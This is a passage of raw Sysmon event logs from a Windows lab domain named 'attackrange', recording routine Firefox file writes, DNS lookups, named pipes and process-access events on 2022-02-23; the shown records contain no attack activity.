Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000288371Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.005{C8EA50B7-11AA-6216-1605-000000003802}2228www.google.com02a00:1450:4001:829::2004;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288370Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.555{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288369Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.546{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage.sqlite-journalMD5=961BFFF8EC830E1EA20D57D506B15B6A,SHA256=3DDBAFBE3EBA48230AA906852231E7697533F1AB4D504495A7B8A47FFCD3CCF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288368Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.522{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\protections.sqlite-journalMD5=751442B4858FC75CFEFAEB69949534E7,SHA256=37C08AC8D88B7D260CEFBB73129554BE291910BB99ADAE66DAE9FA75AF3BAEFC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288367Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.498{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e336a8|C:\Program Files\Mozilla Firefox\xul.dll+e21a18|C:\Program Files\Mozilla Firefox\xul.dll+4228d84|C:\Program Files\Mozilla Firefox\xul.dll+2443950|C:\Program Files\Mozilla Firefox\xul.dll+977c4a|C:\Program Files\Mozilla Firefox\xul.dll+93b2a1|C:\Program Files\Mozilla Firefox\xul.dll+18e1fd|C:\Program Files\Mozilla Firefox\xul.dll+97b107|C:\Program Files\Mozilla Firefox\xul.dll+4385336|C:\Program Files\Mozilla Firefox\xul.dll+94421e|C:\Program Files\Mozilla Firefox\xul.dll+946ef1|C:\Program Files\Mozilla Firefox\xul.dll+945cce|C:\Program Files\Mozilla Firefox\xul.dll+945051|C:\Program Files\Mozilla Firefox\xul.dll+94f179|C:\Program Files\Mozilla Firefox\xul.dll+890b1a|C:\Program Files\Mozilla Firefox\xul.dll+825fe7|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+168da29|C:\Program Files\Mozilla Firefox\xul.dll+19ee82f 23542300x8000000000000000288366Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.417{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\formhistory.sqlite-journalMD5=C4A8A20F647DB62807F20B71EC92818E,SHA256=592789B8125BECE065E2698BBF7C50E7D1030D61481C8BE827F64BD70EF8F710,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288365Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.366{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.109{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local61246-false142.250.186.99fra24s06-in-f3.1e100.net443https 354300x8000000000000000288441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.109{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60940- 354300x8000000000000000288440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.108{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58737- 354300x8000000000000000288439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.102{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local61245- 354300x8000000000000000288438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.881{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55664- 354300x8000000000000000288437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.877{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57344- 354300x8000000000000000288436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.875{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55183- 354300x8000000000000000288435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.866{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-137netbios-nsfalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-ns 354300x8000000000000000288434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.866{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.255-137netbios-ns 354300x8000000000000000288433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.866{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58437- 354300x8000000000000000288432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.866{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local58437- 23542300x8000000000000000288431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.720{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BC9EF2EE99EB5C5A499C8D3681A3D22,SHA256=0E1B1CF88BB739C45E60FC1B667A166E719F81B88B4644C5A8F3D279C2006A7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.705{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73072786F59925D77762EC37C218641E,SHA256=140ECB0923452750F50E7CFB1C6A0F2EED19DD07ECC77CC2D34C7D9E00B9928B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:30.514{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07DA74CA6876DD6EEF5288E7DBC67E1,SHA256=652C7BE5C4EB9406CDA111FFAF28160B8765DA714CC7122307224B663D002387,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.668{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.667{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cd4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.664{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\3671MD5=0528CA447BF9C8FC9C043ABB15D6BFB5,SHA256=68F69C15C2A1702A73928EA9D3726F512FFDFC9C628F58A7C63C90979F92E7C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.663{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\4633MD5=AF0F882DD3623B555737E2AFC115B318,SHA256=6162C20276195DC22830CFF09F84B84CF38B0EF9A2253C84EBAA3EB5AB26DA18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.661{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\7037MD5=ACDA3A873B751518DF7E567C3FB41F27,SHA256=55378DEE73002E8073EA800BA0DC723A791E019BF6D119A173FEE0D2F2133F32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.659{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\15151MD5=1C4ECC6A7D109BB308E2C202CAE1A036,SHA256=81387391A9BABEC0B05C41509E9172E3E564C3CDBFB097D4A1C2ED01171A26BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.656{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.656{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:30.634{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-5C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:30.634{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-5C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.620{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:30.616{C8EA50B7-11AC-6216-1705-000000003802}5396\chrome.2228.12.131705594C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:30.616{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.12.131705594C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.616{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000288415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.122{C8EA50B7-11AA-6216-1605-000000003802}2228gstaticadssl.l.google.com0142.250.186.99;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.611{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+19e61d8|C:\Program Files\Mozilla Firefox\xul.dll+19e4a5b|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:30.611{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.11.163224852C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.607{C8EA50B7-11AA-6216-1605-000000003802}22282412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+12204b|C:\Program Files\Mozilla Firefox\xul.dll+1205b3f|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x8000000000000000288411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:30.607{C8EA50B7-11AA-6216-1605-000000003802}2228\gecko-crash-server-pipe.2228C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000288410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.558{C8EA50B7-11AA-6216-1605-000000003802}22286132C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2bd60|C:\Program Files\Mozilla Firefox\xul.dll+e38a9d|C:\Program Files\Mozilla Firefox\xul.dll+e32cb9|C:\Program Files\Mozilla Firefox\xul.dll+e23ae1|C:\Program Files\Mozilla Firefox\xul.dll+e31d78|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19c76f6|C:\Program Files\Mozilla Firefox\xul.dll+19c6153|C:\Program Files\Mozilla Firefox\xul.dll+168ec17|C:\Program Files\Mozilla Firefox\xul.dll+19eea33|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+18db08|C:\Program Files\Mozilla Firefox\xul.dll+18ca0f|C:\Program Files\Mozilla Firefox\xul.dll+43f0b91|C:\Program Files\Mozilla Firefox\xul.dll+445b03b|C:\Program Files\Mozilla Firefox\xul.dll+445be29|C:\Program Files\Mozilla Firefox\xul.dll+1f9ac83|C:\Program Files\Mozilla Firefox\firefox.exe+9dd0|C:\Program Files\Mozilla Firefox\firefox.exe+1ca08|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.558{C8EA50B7-11AA-6216-1605-000000003802}22285412C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+99a30f|C:\Program Files\Mozilla Firefox\xul.dll+7c6644|C:\Program Files\Mozilla Firefox\xul.dll+19e466f|C:\Program Files\Mozilla Firefox\xul.dll+12ac5|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+126a7|C:\Program Files\Mozilla Firefox\xul.dll+9822f1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 